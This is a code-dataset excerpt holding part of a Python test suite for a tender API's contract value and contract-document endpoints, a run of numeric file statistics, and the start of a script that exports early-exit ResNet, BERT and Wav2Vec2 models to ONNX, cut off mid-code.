"200 OK") self.assertEqual(response.content_type, "application/json") self.assertEqual(response.json["data"]["status"], "active") self.assertEqual(response.json["data"]["contractID"], contract["contractID"]) self.assertEqual(response.json["data"]["items"], contract["items"]) self.assertEqual(response.json["data"]["suppliers"], contract["suppliers"]) self.assertEqual(response.json["data"]["dateSigned"], custom_signature_date) def patch_tender_contract_value(self): response = self.app.get("/tenders/{}/contracts".format(self.tender_id)) contract = response.json["data"][0] response = self.app.patch_json( "/tenders/{}/contracts/{}?acc_token={}".format(self.tender_id, contract["id"], self.tender_token), {"data": {"value": {"amount": 501}}}, status=403, ) self.assertEqual(response.status, "403 Forbidden") self.assertEqual(response.json["errors"][0]["description"], "Amount should be less or equal to awarded amount") response = self.app.patch_json( "/tenders/{}/contracts/{}?acc_token={}".format(self.tender_id, contract["id"], self.tender_token), {"data": {"value": {"amount": 502, "amountNet": 501}}}, status=403, ) self.assertEqual(response.status, "403 Forbidden") self.assertEqual(response.json["errors"][0]["description"], "Amount should be less or equal to awarded amount") response = self.app.patch_json( "/tenders/{}/contracts/{}?acc_token={}".format(self.tender_id, contract["id"], self.tender_token), {"data": {"value": {"amount": 238}}}, status=403, ) self.assertEqual(response.status, "403 Forbidden") self.assertEqual( response.json["errors"][0]["description"], "Amount should be greater than amountNet and differ by no more than 20.0%", ) response = self.app.patch_json( "/tenders/{}/contracts/{}?acc_token={}".format(self.tender_id, contract["id"], self.tender_token), {"data": {"value": {"amount": 100, "amountNet": 80}}}, status=403, ) self.assertEqual(response.status, "403 Forbidden") self.assertEqual( response.json["errors"][0]["description"], "Amount should be greater than amountNet and differ by no more than 20.0%", ) response = self.app.patch_json( "/tenders/{}/contracts/{}?acc_token={}".format(self.tender_id, contract["id"], self.tender_token), {"data": {"value": {"amount": 238, "amountNet": 238}}}, status=403, ) self.assertEqual(response.status, "403 Forbidden") self.assertEqual( response.json["errors"][0]["description"], "Amount should be greater than amountNet and differ by no more than 20.0%", ) response = self.app.patch_json( "/tenders/{}/contracts/{}?acc_token={}".format(self.tender_id, contract["id"], self.tender_token), {"data": {"value": {"amount": 100, "amountNet": 85}}}, ) self.assertEqual(response.status, "200 OK") self.assertEqual(response.json["data"]["value"]["amount"], 100) self.assertEqual(response.json["data"]["value"]["amountNet"], 85) response = self.app.patch_json( "/tenders/{}/contracts/{}?acc_token={}".format(self.tender_id, contract["id"], self.tender_token), {"data": {"value": {"valueAddedTaxIncluded": False}}}, status=403, ) self.assertEqual(response.status, "403 Forbidden") self.assertEqual(response.json["errors"][0]["description"], "Amount and amountNet should be equal") def patch_tender_contract_value_vat_not_included(self): response = self.app.get("/tenders/{}/contracts".format(self.tender_id)) contract = response.json["data"][0] response = self.app.patch_json( "/tenders/{}/contracts/{}?acc_token={}".format(self.tender_id, contract["id"], self.tender_token), {"data": {"value": {"currency": "USD"}}}, status=403, ) self.assertEqual(response.status, "403 Forbidden") self.assertEqual(response.json["errors"][0]["description"], "Can't update currency for contract value") response = self.app.patch_json( "/tenders/{}/contracts/{}?acc_token={}".format(self.tender_id, contract["id"], self.tender_token), {"data": {"value": {"amount": 468}}}, status=403, ) self.assertEqual(response.status, "403 Forbidden") self.assertEqual(response.json["errors"][0]["description"], "Amount and amountNet should be equal") response = self.app.patch_json( "/tenders/{}/contracts/{}?acc_token={}".format(self.tender_id, contract["id"], self.tender_token), {"data": {"value": {"amount": 600, "amountNet": 600}}}, status=403, ) self.assertEqual(response.status, "403 Forbidden") self.assertEqual(response.json["errors"][0]["description"], "Amount should be less or equal to awarded amount") response = self.app.patch_json( "/tenders/{}/contracts/{}?acc_token={}".format(self.tender_id, contract["id"], self.tender_token), {"data": {"value": {"amount": 400, "amountNet": 400}}}, ) self.assertEqual(response.status, "200 OK") self.assertEqual(response.json["data"]["value"]["amount"], 400) self.assertEqual(response.json["data"]["value"]["amountNet"], 400) response = self.app.patch_json( "/tenders/{}/contracts/{}?acc_token={}".format(self.tender_id, contract["id"], self.tender_token), {"data": {"value": {"valueAddedTaxIncluded": True}}}, status=403, ) self.assertEqual(response.status, "403 Forbidden") self.assertEqual( response.json["errors"][0]["description"], "Amount should be greater than amountNet and differ by no more than 20.0%", ) def get_tender_contract(self): self.app.authorization = ("Basic", ("token", "")) response = self.app.post_json( "/tenders/{}/contracts".format(self.tender_id), {"data": {"title": "contract title", "description": "contract description", "awardID": self.award_id}}, ) self.assertEqual(response.status, "201 Created") self.assertEqual(response.content_type, "application/json") contract = response.json["data"] self.app.authorization = ("Basic", ("broker", "")) response = self.app.get("/tenders/{}/contracts/{}".format(self.tender_id, contract["id"])) self.assertEqual(response.status, "200 OK") self.assertEqual(response.content_type, "application/json") self.assertEqual(response.json["data"], contract) response = self.app.get("/tenders/{}/contracts/some_id".format(self.tender_id), status=404) self.assertEqual(response.status, "404 Not Found") self.assertEqual(response.content_type, "application/json") self.assertEqual(response.json["status"], "error") self.assertEqual( response.json["errors"], [{u"description": u"Not Found", u"location": u"url", u"name": u"contract_id"}] ) response = self.app.get("/tenders/some_id/contracts/some_id", status=404) self.assertEqual(response.status, "404 Not Found") self.assertEqual(response.content_type, "application/json") self.assertEqual(response.json["status"], "error") self.assertEqual( response.json["errors"], [{u"description": u"Not Found", u"location": u"url", u"name": u"tender_id"}] ) def get_tender_contracts(self): self.app.authorization = ("Basic", ("token", "")) response = self.app.post_json( "/tenders/{}/contracts".format(self.tender_id), {"data": {"title": "contract title", "description": "contract description", "awardID": self.award_id}}, ) self.assertEqual(response.status, "201 Created") self.assertEqual(response.content_type, "application/json") contract = response.json["data"] self.app.authorization = ("Basic", ("broker", "")) response = self.app.get("/tenders/{}/contracts".format(self.tender_id)) self.assertEqual(response.status, "200 OK") self.assertEqual(response.content_type, "application/json") self.assertEqual(response.json["data"][-1], contract) response = self.app.get("/tenders/some_id/contracts", status=404) self.assertEqual(response.status, "404 Not Found") self.assertEqual(response.content_type, "application/json") self.assertEqual(response.json["status"], "error") self.assertEqual( response.json["errors"], [{u"description": u"Not Found", u"location": u"url", u"name": u"tender_id"}] ) # Tender2LotContractResourceTest def lot2_patch_tender_contract(self): auth = self.app.authorization self.app.authorization = ("Basic", ("token", "")) response = self.app.post_json( "/tenders/{}/contracts".format(self.tender_id), {"data": {"title": "contract title", "description": "contract description", "awardID": self.award_id}}, ) self.assertEqual(response.status, "201 Created") self.assertEqual(response.content_type, "application/json") contract = response.json["data"] self.app.authorization = auth response = self.app.patch_json( "/tenders/{}/contracts/{}?acc_token={}".format(self.tender_id, contract["id"], self.tender_token), {"data": {"status": "active"}}, status=403, ) self.assertEqual(response.status, "403 Forbidden") self.assertEqual(response.content_type, "application/json") self.assertIn("Can't sign contract before stand-still period end (", response.json["errors"][0]["description"]) self.set_status("complete", {"status": "active.awarded"}) response = self.app.post_json( "/tenders/{}/cancellations?acc_token={}".format(self.tender_id, self.tender_token), { "data": { "reason": "cancellation reason", "status": "active", "cancellationOf": "lot", "relatedLot": self.initial_lots[0]["id"], } }, ) response = self.app.patch_json( "/tenders/{}/contracts/{}?acc_token={}".format(self.tender_id, contract["id"], self.tender_token), {"data": {"status": "active"}}, status=403, ) self.assertEqual(response.status, "403 Forbidden") self.assertEqual(response.content_type, "application/json") self.assertEqual(response.json["errors"][0]["description"], "Can update contract only in active lot status") # TenderContractDocumentResourceTest def not_found(self): response = self.app.post( "/tenders/some_id/contracts/some_id/documents?acc_token={}".format(self.tender_token), status=404, upload_files=[("file", "name.doc", "content")], ) self.assertEqual(response.status, "404 Not Found") self.assertEqual(response.content_type, "application/json") self.assertEqual(response.json["status"], "error") self.assertEqual( response.json["errors"], [{u"description": u"Not Found", u"location": u"url", u"name": u"tender_id"}] ) response = self.app.post( "/tenders/{}/contracts/some_id/documents?acc_token={}".format(self.tender_id, self.tender_token), status=404, upload_files=[("file", "name.doc", "content")], ) self.assertEqual(response.status, "404 Not Found") self.assertEqual(response.content_type, "application/json") self.assertEqual(response.json["status"], "error") self.assertEqual( response.json["errors"], [{u"description": u"Not Found", u"location": u"url", u"name": u"contract_id"}] ) response = self.app.post( "/tenders/{}/contracts/{}/documents?acc_token={}".format(self.tender_id, self.contract_id, self.tender_token), status=404, upload_files=[("invalid_value", "name.doc", "content")], ) self.assertEqual(response.status, "404 Not Found") self.assertEqual(response.content_type, "application/json") self.assertEqual(response.json["status"], "error") self.assertEqual(response.json["errors"], [{u"description": u"Not Found", u"location": u"body", u"name": u"file"}]) response = self.app.get("/tenders/some_id/contracts/some_id/documents", status=404) self.assertEqual(response.status, "404 Not Found") self.assertEqual(response.content_type, "application/json") self.assertEqual(response.json["status"], "error") self.assertEqual( response.json["errors"], [{u"description": u"Not Found", u"location": u"url", u"name": u"tender_id"}] ) response = self.app.get("/tenders/{}/contracts/some_id/documents".format(self.tender_id), status=404) self.assertEqual(response.status, "404 Not Found") self.assertEqual(response.content_type, "application/json") self.assertEqual(response.json["status"], "error") self.assertEqual( response.json["errors"], [{u"description": u"Not Found", u"location": u"url", u"name": u"contract_id"}] ) response = self.app.get("/tenders/some_id/contracts/some_id/documents/some_id", status=404) self.assertEqual(response.status, "404 Not Found") self.assertEqual(response.content_type, "application/json") self.assertEqual(response.json["status"], "error") self.assertEqual( response.json["errors"], [{u"description": u"Not Found", u"location": u"url", u"name": u"tender_id"}] ) response = self.app.get("/tenders/{}/contracts/some_id/documents/some_id".format(self.tender_id), status=404) self.assertEqual(response.status, "404 Not Found") self.assertEqual(response.content_type, "application/json") self.assertEqual(response.json["status"], "error") self.assertEqual( response.json["errors"], [{u"description": u"Not Found", u"location": u"url", u"name": u"contract_id"}] ) response = self.app.get( "/tenders/{}/contracts/{}/documents/some_id".format(self.tender_id, self.contract_id), status=404 ) self.assertEqual(response.status, "404 Not Found") self.assertEqual(response.content_type, "application/json") self.assertEqual(response.json["status"], "error") self.assertEqual( response.json["errors"], [{u"description": u"Not Found", u"location": u"url", u"name": u"document_id"}] ) response = self.app.put( "/tenders/some_id/contracts/some_id/documents/some_id?acc_token={}".format(self.tender_token), status=404, upload_files=[("file", "name.doc", "content2")], ) self.assertEqual(response.status, "404 Not Found") self.assertEqual(response.content_type, "application/json") self.assertEqual(response.json["status"], "error") self.assertEqual( response.json["errors"], [{u"description": u"Not Found", u"location": u"url", u"name": u"tender_id"}] ) response = self.app.put( "/tenders/{}/contracts/some_id/documents/some_id?acc_token={}".format(self.tender_id, self.tender_token), status=404, upload_files=[("file", "name.doc", "content2")], ) self.assertEqual(response.status, "404 Not Found") self.assertEqual(response.content_type, "application/json") self.assertEqual(response.json["status"], "error") self.assertEqual( response.json["errors"], [{u"description": u"Not Found", u"location": u"url", u"name": u"contract_id"}] ) response = self.app.put( "/tenders/{}/contracts/{}/documents/some_id?acc_token={}".format( self.tender_id, self.contract_id, self.tender_token ), status=404, upload_files=[("file", "name.doc", "content2")], ) self.assertEqual(response.status, "404 Not Found") self.assertEqual(response.content_type, "application/json") self.assertEqual(response.json["status"], "error") self.assertEqual( response.json["errors"], [{u"description": u"Not Found", u"location": u"url", u"name": u"document_id"}] ) def create_tender_contract_document(self): response = self.app.post( "/tenders/{}/contracts/{}/documents?acc_token={}".format(self.tender_id, self.contract_id, self.tender_token), upload_files=[("file", "name.doc", "content")], ) self.assertEqual(response.status, "201 Created") self.assertEqual(response.content_type, "application/json") doc_id = response.json["data"]["id"] self.assertIn(doc_id, response.headers["Location"]) self.assertEqual("name.doc", response.json["data"]["title"]) key = response.json["data"]["url"].split("?")[-1] response = self.app.get("/tenders/{}/contracts/{}/documents".format(self.tender_id, self.contract_id)) self.assertEqual(response.status, "200 OK") self.assertEqual(response.content_type, "application/json") self.assertEqual(doc_id, response.json["data"][0]["id"]) self.assertEqual("name.doc", response.json["data"][0]["title"]) response = self.app.get("/tenders/{}/contracts/{}/documents?all=true".format(self.tender_id, self.contract_id)) self.assertEqual(response.status, "200 OK") self.assertEqual(response.content_type, "application/json") self.assertEqual(doc_id, response.json["data"][0]["id"]) self.assertEqual("name.doc", response.json["data"][0]["title"]) response = self.app.get( "/tenders/{}/contracts/{}/documents/{}?download=some_id".format(self.tender_id, self.contract_id, doc_id), status=404, ) self.assertEqual(response.status, "404 Not Found") self.assertEqual(response.content_type, "application/json") self.assertEqual(response.json["status"], "error") self.assertEqual( response.json["errors"], [{u"description": u"Not Found", u"location": u"url", u"name": u"download"}] ) response = self.app.get( "/tenders/{}/contracts/{}/documents/{}?{}".format(self.tender_id, self.contract_id, doc_id, key) ) self.assertEqual(response.status, "200 OK") self.assertEqual(response.content_type, "application/msword") self.assertEqual(response.content_length, 7) self.assertEqual(response.body, "content") response = self.app.get("/tenders/{}/contracts/{}/documents/{}".format(self.tender_id, self.contract_id, doc_id)) self.assertEqual(response.status, "200 OK") self.assertEqual(response.content_type, "application/json") self.assertEqual(doc_id, response.json["data"]["id"]) self.assertEqual("name.doc", response.json["data"]["title"]) tender = self.db.get(self.tender_id) tender["contracts"][-1]["status"] = "cancelled" self.db.save(tender) response = self.app.post( "/tenders/{}/contracts/{}/documents?acc_token={}".format(self.tender_id, self.contract_id, self.tender_token), upload_files=[("file", "name.doc", "content")], status=403, ) self.assertEqual(response.status, "403 Forbidden") self.assertEqual(response.content_type, "application/json") self.assertEqual(response.json["errors"][0]["description"], "Can't add document in current contract status") self.set_status("{}".format(self.forbidden_contract_document_modification_actions_status)) response = self.app.post( "/tenders/{}/contracts/{}/documents?acc_token={}".format(self.tender_id, self.contract_id, self.tender_token), upload_files=[("file", "name.doc", "content")], status=403, ) self.assertEqual(response.status, "403 Forbidden") self.assertEqual(response.content_type, "application/json") self.assertEqual( response.json["errors"][0]["description"], "Can't add document in current ({}) tender status".format( self.forbidden_contract_document_modification_actions_status ), ) def put_tender_contract_document(self): response = self.app.post( "/tenders/{}/contracts/{}/documents?acc_token={}".format(self.tender_id, self.contract_id, self.tender_token), upload_files=[("file", "name.doc", "content")], ) self.assertEqual(response.status, "201 Created") self.assertEqual(response.content_type, "application/json") doc_id = response.json["data"]["id"] self.assertIn(doc_id, response.headers["Location"]) response = self.app.put( "/tenders/{}/contracts/{}/documents/{}?acc_token={}".format( self.tender_id, self.contract_id, doc_id, self.tender_token ), status=404, upload_files=[("invalid_name", "name.doc", "content")], ) self.assertEqual(response.status, "404 Not Found") self.assertEqual(response.content_type, "application/json") self.assertEqual(response.json["status"], "error") self.assertEqual(response.json["errors"], [{u"description": u"Not Found", u"location": u"body", u"name": u"file"}]) response = self.app.put( "/tenders/{}/contracts/{}/documents/{}?acc_token={}".format( self.tender_id, self.contract_id, doc_id, self.tender_token ), upload_files=[("file", "name.doc", "content2")], ) self.assertEqual(response.status, "200 OK") self.assertEqual(response.content_type, "application/json") self.assertEqual(doc_id, response.json["data"]["id"]) key = response.json["data"]["url"].split("?")[-1] response = self.app.get( "/tenders/{}/contracts/{}/documents/{}?{}".format(self.tender_id, self.contract_id, doc_id, key) ) self.assertEqual(response.status, "200 OK") self.assertEqual(response.content_type, "application/msword") self.assertEqual(response.content_length, 8) self.assertEqual(response.body, "content2") response = self.app.get("/tenders/{}/contracts/{}/documents/{}".format(self.tender_id, self.contract_id, doc_id)) self.assertEqual(response.status, "200 OK") self.assertEqual(response.content_type, "application/json") self.assertEqual(doc_id, response.json["data"]["id"]) self.assertEqual("name.doc", response.json["data"]["title"]) response = self.app.put( "/tenders/{}/contracts/{}/documents/{}?acc_token={}".format( self.tender_id, self.contract_id, doc_id, self.tender_token ), "content3", content_type="application/msword", ) self.assertEqual(response.status, "200 OK") self.assertEqual(response.content_type, "application/json") self.assertEqual(doc_id, response.json["data"]["id"]) key = response.json["data"]["url"].split("?")[-1] response = self.app.get( "/tenders/{}/contracts/{}/documents/{}?{}".format(self.tender_id, self.contract_id, doc_id, key) ) self.assertEqual(response.status, "200 OK") self.assertEqual(response.content_type, "application/msword") self.assertEqual(response.content_length, 8) self.assertEqual(response.body, "content3") tender = self.db.get(self.tender_id) tender["contracts"][-1]["status"] = "cancelled" self.db.save(tender) response = self.app.put( "/tenders/{}/contracts/{}/documents/{}?acc_token={}".format( self.tender_id, self.contract_id, doc_id, self.tender_token ), upload_files=[("file", "name.doc", "content3")], status=403, ) self.assertEqual(response.status, "403 Forbidden") self.assertEqual(response.content_type, "application/json") self.assertEqual(response.json["errors"][0]["description"], "Can't update document in current contract status") self.set_status("{}".format(self.forbidden_contract_document_modification_actions_status)) response = self.app.put( "/tenders/{}/contracts/{}/documents/{}?acc_token={}".format( self.tender_id, self.contract_id, doc_id, self.tender_token ), upload_files=[("file", "name.doc", "content3")], status=403, ) self.assertEqual(response.status, "403 Forbidden") self.assertEqual(response.content_type, "application/json") self.assertEqual( response.json["errors"][0]["description"], "Can't update document in current ({}) tender status".format( self.forbidden_contract_document_modification_actions_status ), ) def patch_tender_contract_document(self): response = self.app.post( "/tenders/{}/contracts/{}/documents?acc_token={}".format(self.tender_id, self.contract_id, self.tender_token), upload_files=[("file", "name.doc", "content")], ) self.assertEqual(response.status, "201 Created") self.assertEqual(response.content_type, "application/json") doc_id = response.json["data"]["id"] self.assertIn(doc_id, response.headers["Location"]) response = self.app.patch_json( "/tenders/{}/contracts/{}/documents/{}?acc_token={}".format( self.tender_id, self.contract_id, doc_id, self.tender_token ), {"data": {"description": "document description"}}, ) self.assertEqual(response.status, "200 OK") self.assertEqual(response.content_type, "application/json") self.assertEqual(doc_id, response.json["data"]["id"]) response = self.app.get("/tenders/{}/contracts/{}/documents/{}".format(self.tender_id, self.contract_id, doc_id)) self.assertEqual(response.status, "200 OK") self.assertEqual(response.content_type, "application/json") self.assertEqual(doc_id, response.json["data"]["id"]) self.assertEqual("document description", response.json["data"]["description"]) tender = self.db.get(self.tender_id) tender["contracts"][-1]["status"] = "cancelled" self.db.save(tender) response = self.app.patch_json( "/tenders/{}/contracts/{}/documents/{}?acc_token={}".format( self.tender_id, self.contract_id, doc_id, self.tender_token ), {"data": {"description": "document description"}}, status=403, ) self.assertEqual(response.status, "403 Forbidden") self.assertEqual(response.content_type, "application/json") self.assertEqual(response.json["errors"][0]["description"], "Can't update document in current contract status") self.set_status("{}".format(self.forbidden_contract_document_modification_actions_status)) response = self.app.patch_json( "/tenders/{}/contracts/{}/documents/{}?acc_token={}".format( self.tender_id, self.contract_id, doc_id, self.tender_token ), {"data": {"description": "document description"}}, status=403, ) self.assertEqual(response.status, "403 Forbidden") self.assertEqual(response.content_type, "application/json") self.assertEqual( response.json["errors"][0]["description"], "Can't update document in current ({}) tender status".format( self.forbidden_contract_document_modification_actions_status ), ) # Tender2LotContractDocumentResourceTest def lot2_create_tender_contract_document(self): response = self.app.post( "/tenders/{}/contracts/{}/documents?acc_token={}".format(self.tender_id, self.contract_id, self.tender_token), upload_files=[("file", "name.doc", "content")], ) self.assertEqual(response.status, "201 Created") self.assertEqual(response.content_type, "application/json") doc_id = response.json["data"]["id"] self.assertIn(doc_id, response.headers["Location"]) self.assertEqual("name.doc", response.json["data"]["title"]) key = response.json["data"]["url"].split("?")[-1] response = self.app.post_json( "/tenders/{}/cancellations?acc_token={}".format(self.tender_id, self.tender_token), { "data": { "reason": "cancellation reason", "status": "active", "cancellationOf": "lot", "relatedLot": self.initial_lots[0]["id"], } }, ) response = self.app.post( "/tenders/{}/contracts/{}/documents?acc_token={}".format(self.tender_id, self.contract_id, self.tender_token), upload_files=[("file", "name.doc", "content")], status=403, ) self.assertEqual(response.status, "403 Forbidden") self.assertEqual(response.content_type, "application/json") self.assertEqual(response.json["errors"][0]["description"], "Can add document only in active lot status") def lot2_put_tender_contract_document(self): response = self.app.post( "/tenders/{}/contracts/{}/documents?acc_token={}".format(self.tender_id, self.contract_id, self.tender_token), upload_files=[("file", "name.doc", "content")], ) self.assertEqual(response.status, "201 Created") self.assertEqual(response.content_type, "application/json") doc_id = response.json["data"]["id"] self.assertIn(doc_id, response.headers["Location"]) response = self.app.put( "/tenders/{}/contracts/{}/documents/{}?acc_token={}".format( self.tender_id, self.contract_id, doc_id, self.tender_token ), status=404, upload_files=[("invalid_name", "name.doc", "content")], ) self.assertEqual(response.status, "404 Not Found") self.assertEqual(response.content_type, "application/json") self.assertEqual(response.json["status"], "error") self.assertEqual(response.json["errors"], [{u"description": u"Not Found", u"location": u"body", u"name": u"file"}]) response = self.app.put( "/tenders/{}/contracts/{}/documents/{}?acc_token={}".format( self.tender_id, self.contract_id, doc_id, self.tender_token ), upload_files=[("file", "name.doc", "content2")], ) self.assertEqual(response.status, "200 OK") self.assertEqual(response.content_type, "application/json") self.assertEqual(doc_id, response.json["data"]["id"]) key = response.json["data"]["url"].split("?")[-1] response = self.app.post_json( "/tenders/{}/cancellations?acc_token={}".format(self.tender_id, self.tender_token), { "data": { "reason": "cancellation reason", "status": "active", "cancellationOf": "lot", "relatedLot": self.initial_lots[0]["id"], } }, ) response = self.app.put( "/tenders/{}/contracts/{}/documents/{}?acc_token={}".format( self.tender_id, self.contract_id, doc_id, self.tender_token ), upload_files=[("file", "name.doc", "content3")], status=403, ) self.assertEqual(response.status, "403 Forbidden") self.assertEqual(response.content_type, "application/json") self.assertEqual(response.json["errors"][0]["description"], "Can update document only in active lot status") def lot2_patch_tender_contract_document(self): response = self.app.post( "/tenders/{}/contracts/{}/documents?acc_token={}".format(self.tender_id, self.contract_id, self.tender_token), upload_files=[("file", "name.doc", "content")], ) self.assertEqual(response.status, "201 Created") self.assertEqual(response.content_type, "application/json") doc_id = response.json["data"]["id"] self.assertIn(doc_id, response.headers["Location"]) response = self.app.patch_json( "/tenders/{}/contracts/{}/documents/{}?acc_token={}".format( self.tender_id, self.contract_id, doc_id, self.tender_token ), {"data": {"description": "document description"}}, ) self.assertEqual(response.status, "200 OK") self.assertEqual(response.content_type, "application/json") self.assertEqual(doc_id, response.json["data"]["id"]) response = self.app.post_json( "/tenders/{}/cancellations?acc_token={}".format(self.tender_id, self.tender_token), { "data": { "reason": "cancellation reason", "status": "active", "cancellationOf": "lot", "relatedLot": self.initial_lots[0]["id"], } }, ) response = self.app.patch_json( "/tenders/{}/contracts/{}/documents/{}?acc_token={}".format( self.tender_id, self.contract_id, doc_id, self.tender_token ), {"data": {"description": "new document description"}}, status=403, ) self.assertEqual(response.status, "403 Forbidden") self.assertEqual(response.content_type, "application/json") self.assertEqual(response.json["errors"][0]["description"], "Can update document only in active lot status")
43.144222
119
0.64522
5,665
49,659
5.540512
0.038129
0.142894
0.20518
0.089464
0.934686
0.924714
0.915443
0.904706
0.891484
0.886864
0
0.01526
0.177873
49,659
1,150
120
43.181739
0.753539
0.003081
0
0.699399
0
0
0.287394
0.08101
0
0
0
0
0.313627
1
0.016032
false
0
0.004008
0
0.02004
0
0
0
0
null
0
1
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
82f09aa73fe781698f4fa0075d5bfa6537287801
23,470
py
Python
Inference/src/exit_placement/model_export_v2.py
ZSL98/ETBA
618317698adb9e372fb11dc0c3a01f856e0759b0
[ "MIT" ]
1
2021-12-01T15:22:44.000Z
2021-12-01T15:22:44.000Z
Inference/src/exit_placement/model_export_v2.py
ZSL98/ETBA
618317698adb9e372fb11dc0c3a01f856e0759b0
[ "MIT" ]
null
null
null
Inference/src/exit_placement/model_export_v2.py
ZSL98/ETBA
618317698adb9e372fb11dc0c3a01f856e0759b0
[ "MIT" ]
null
null
null
import torch import torch.nn as nn from networks_v2 import resnet_s1, resnet_s2, posenet_s1, posenet_s2, backbone_s2, backbone_s3, backbone_init from transformers import Wav2Vec2FeatureExtractor, Wav2Vec2Processor, Wav2Vec2CTCTokenizer from wav2vec2_model import Wav2Vec2_with_exit_s1, Wav2Vec2_with_exit_s2, Wav2Vec2_with_dual_exit from modeling_bert import BertWithExit_s1, BertWithExit_s2, BertWithDualExit from ocrnet_with_exit import SpatialOCRNet_s1, SpatialOCRNet_s2, SpatialOCRNet import torchvision.models as models import copy model = models.resnet101(pretrained=True) class construct_net(object): def __init__(self, begin_point: int = 0, split_point: int = 0, backbone: str = 'resnet') -> None: super().__init__() self.backbone = backbone self.begin_point = begin_point self.split_point = split_point def construct_net_init(self): if self.backbone == 'resnet' or self.backbone == 'posenet': return backbone_init(layers=[3, 4, 23, 3], split_point_s1=self.begin_point, split_point_s2=self.begin_point, split_point_s3=self.begin_point) def construct_net_s1(self): if self.backbone == 'resnet': if self.begin_point == 0: return resnet_s1(layers=[3, 4, 23, 3], begin_point=self.begin_point, split_point_s1=self.split_point, split_point_s2=self.split_point, split_point_s3=self.split_point, is_init=True) else: return resnet_s1(layers=[3, 4, 23, 3], begin_point=self.begin_point, split_point_s1=self.split_point, split_point_s2=self.split_point, split_point_s3=self.split_point, is_init=False) elif self.backbone == 'posenet': if self.begin_point == 0: return posenet_s1(layers=[3, 4, 23, 3], begin_point=self.begin_point, split_point_s1=self.split_point, split_point_s2=self.split_point, split_point_s3=self.split_point, is_init=True) else: return posenet_s2(layers=[3, 4, 23, 3], begin_point=self.begin_point, split_point_s1=self.split_point, split_point_s2=self.split_point, split_point_s3=self.split_point, is_init=False) elif self.backbone == 'bert': if self.begin_point == 0: model = BertWithExit_s1.from_pretrained('bert-base-uncased') model.add_exit(start_point=self.split_point, end_point=self.split_point) return model else: model = BertWithDualExit.from_pretrained('bert-base-uncased') model.add_exit(num_hidden_layers=self.split_point) return model elif self.backbone == 'Wav2Vec2': tokenizer = Wav2Vec2CTCTokenizer("/home/slzhang/projects/ETBA/Inference/src/exit_placement/vocab.json", unk_token="[UNK]", pad_token="[PAD]", word_delimiter_token="|") feature_extractor = Wav2Vec2FeatureExtractor(feature_size=1, sampling_rate=16000, padding_value=0.0, do_normalize=True, return_attention_mask=False) processor = Wav2Vec2Processor(feature_extractor=feature_extractor, tokenizer=tokenizer) if self.begin_point == 0: model_CTC = Wav2Vec2_with_exit_s1.from_pretrained( "facebook/wav2vec2-base", gradient_checkpointing=True, ctc_loss_reduction="mean", pad_token_id=processor.tokenizer.pad_token_id, ) model_CTC.add_exit(start_point=self.split_point, end_point=self.split_point) else: model_CTC = Wav2Vec2_with_dual_exit.from_pretrained( "facebook/wav2vec2-base", gradient_checkpointing=True, ctc_loss_reduction="mean", pad_token_id=processor.tokenizer.pad_token_id, ) model_CTC.add_exit(num_hidden_layers=self.split_point) return model_CTC elif self.backbone == 'openseg': return SpatialOCRNet_s1(self.start_point) def construct_net_s2(self): if self.backbone == 'resnet': return resnet_s2(layers=[3, 4, 23, 3], begin_point=self.begin_point, split_point_s1=self.split_point, split_point_s2=self.split_point, split_point_s3=self.split_point, ) elif self.backbone == 'posenet': return posenet_s2(layers=[3, 4, 23, 3], begin_point=self.begin_point, split_point_s1=self.split_point, split_point_s2=self.split_point, split_point_s3=self.split_point, ) elif self.backbone == 'bert': model = BertWithExit_s2.from_pretrained('bert-base-uncased') model.add_exit(end_point=self.begin_point+self.split_point) return model elif self.backbone == 'Wav2Vec2': tokenizer = Wav2Vec2CTCTokenizer("/home/slzhang/projects/ETBA/Inference/src/exit_placement/vocab.json", unk_token="[UNK]", pad_token="[PAD]", word_delimiter_token="|") feature_extractor = Wav2Vec2FeatureExtractor(feature_size=1, sampling_rate=16000, padding_value=0.0, do_normalize=True, return_attention_mask=False) processor = Wav2Vec2Processor(feature_extractor=feature_extractor, tokenizer=tokenizer) model_CTC = Wav2Vec2_with_exit_s2.from_pretrained( "facebook/wav2vec2-base", gradient_checkpointing=True, ctc_loss_reduction="mean", pad_token_id=processor.tokenizer.pad_token_id, ) model_CTC.add_exit(end_point=self.begin_point+self.split_point) return model_CTC elif self.backbone == 'openseg': return SpatialOCRNet_s2(self.start_point) def construct_net_s3(self): if self.backbone == 'resnet' or self.backbone == 'posenet': return backbone_s3(layers=[3, 4, 23, 3], split_point_s1=self.split_point_s1, split_point_s2=self.split_point_s2, split_point_s3=self.split_point_s3 ) def model_export_func(model_name, begin_point, split_point, exit_type=False): inst = construct_net(begin_point=begin_point, split_point=split_point, backbone = model_name) # dummy_input1 = torch.randn(1, 3, 513, 513) if inst.backbone == "resnet": dummy_input1 = torch.randn(1, 3, 224, 224) if begin_point != 0: model_init = inst.construct_net_init() model_init.eval() dummy_input1 = model_init(dummy_input1) dummy_input1 = dummy_input1[0] elif inst.backbone == "posenet": dummy_input1 = torch.randn(1, 3, 384, 384) if begin_point != 0: model_init = inst.construct_net_init() model_init.eval() dummy_input1 = model_init(dummy_input1) dummy_input1 = dummy_input1[0] elif inst.backbone == "openseg": dummy_input1 = torch.randn(1, 3, 1024, 2048) # dummy_input1 = torch.randn(1, 3, 384, 384) elif inst.backbone == "Wav2Vec2": dummy_input1 = torch.randn(1, 10000) if begin_point != 0: dummy_input1 = torch.randn(1, 31, 768) s1_model = inst.construct_net_s1() s1_model.eval() if inst.backbone == "resnet": dummy_input2 = s1_model(dummy_input1) dummy_input2 = dummy_input2[0] elif inst.backbone == "posenet": dummy_input2, x_exit = s1_model(dummy_input1) # dummy_input2 = dummy_input2[0] elif inst.backbone == "Wav2Vec2": dummy_input2 = torch.randn(1, 31, 768) elif inst.backbone == "openseg": # x_dsn, x, x_moveon = s1_model(dummy_input1) dummy_input2 = torch.randn(1, 1024, 129, 257) # dummy_input2 = torch.randn(1, 1024, 48, 48) # print(x_moveon.shape) s2_model = inst.construct_net_s2() s2_model.eval() # tmp_model = SpatialOCRNet() # tmp_model = model # s2_input_names = ["input"] # # s2_output_names = ["output_dsn", "output"] # s2_output_names = ["output"] # torch.onnx.export(tmp_model, dummy_input1, # "/home/slzhang/projects/ETBA/Inference/src/exit_placement/models/" + inst.backbone + "_s0.onnx", # input_names=s2_input_names, output_names=s2_output_names, # verbose=False,dynamic_axes={ # 'input': {0: 'batch_size'}, # 'output': {0: 'batch_size'}, # # 'output': {0: 